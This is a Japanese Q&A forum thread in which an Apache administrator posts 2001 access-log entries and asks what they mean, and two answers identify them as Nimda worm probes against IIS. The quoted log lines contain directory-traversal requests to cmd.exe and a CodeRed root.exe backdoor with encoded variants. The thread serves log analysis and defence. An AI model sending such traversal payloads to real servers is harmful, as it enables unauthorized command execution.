• 締切済み

apacheのログでこんなの出たんですけど…

apacheのログで3日ほど前から以下の様なアクセスが いろいろなIPアドレスから来るのですが 何をやろうとしているのでしょうか? 211.196.98.124 - - [20/Sep/2001:03:32:52 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 403 280 211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 403 278 211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288 211.196.98.124 - - [20/Sep/2001:03:32:53 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 288 211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302 211.196.98.124 - - [20/Sep/2001:03:32:54 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 319 中略 211.196.98.124 - - [20/Sep/2001:03:32:57 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281 211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302 211.196.98.124 - - [20/Sep/2001:03:32:58 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 302 なんとなくdirコマンドでCドライブの内容を調べようとしているのはわかるのですが… 環境はWinNT4.0sp4 apache 1.3.20です。 あと、エラーコード(?)の403と404は知っているのですが 400はどういう意味なのでしょうか? また何か問題はあるのでしょうか?

みんなの回答

  • saya9999
  • ベストアンサー率20% (1/5)
回答No.2

NIMDAのアタックログです。 ですがIISのセキュリティホールを狙ったものですので、 Apacheには感染の危険性はありません。 IISには大ざっぱに言うと、とあるセキュリティホールを 突くと、Webディレクトリからシステムディレクトリへ侵入するという 大穴があります。上記はそれを狙ったもので、『root.exe』を リクエストしているのは、もしそのIISがCodeRedに感染していた 場合は、そのバックドアを利用して侵入を図ろう、というものです。 (ちなみに、次回はIPは伏せた方が良いと思いますよ。)

すると、全ての回答が全文表示されます。
  • ka-2
  • ベストアンサー率37% (22/58)
回答No.1

おそらくNIMDAウイルスが侵入しようとした跡でしょう。 詳細はGooニュース http://channel.goo.ne.jp/news/mycom/it/20010920/20010920-01.html を参照してください。 400 -Bad Request は「間違ったURLを入力したのでサーバが理解できなかった」です。

すると、全ての回答が全文表示されます。
  1. カテゴリ
  2. [技術者向] コンピューター
  3. ITシステム運用・管理
  4. ネットワーク

関連するQ&A

注目のQ&A

カテゴリ

OKWAVE コラム

あなたにピッタリな商品が見つかる! OKWAVE セレクト

専門家に質問してみよう

職業から探して質問する
質問する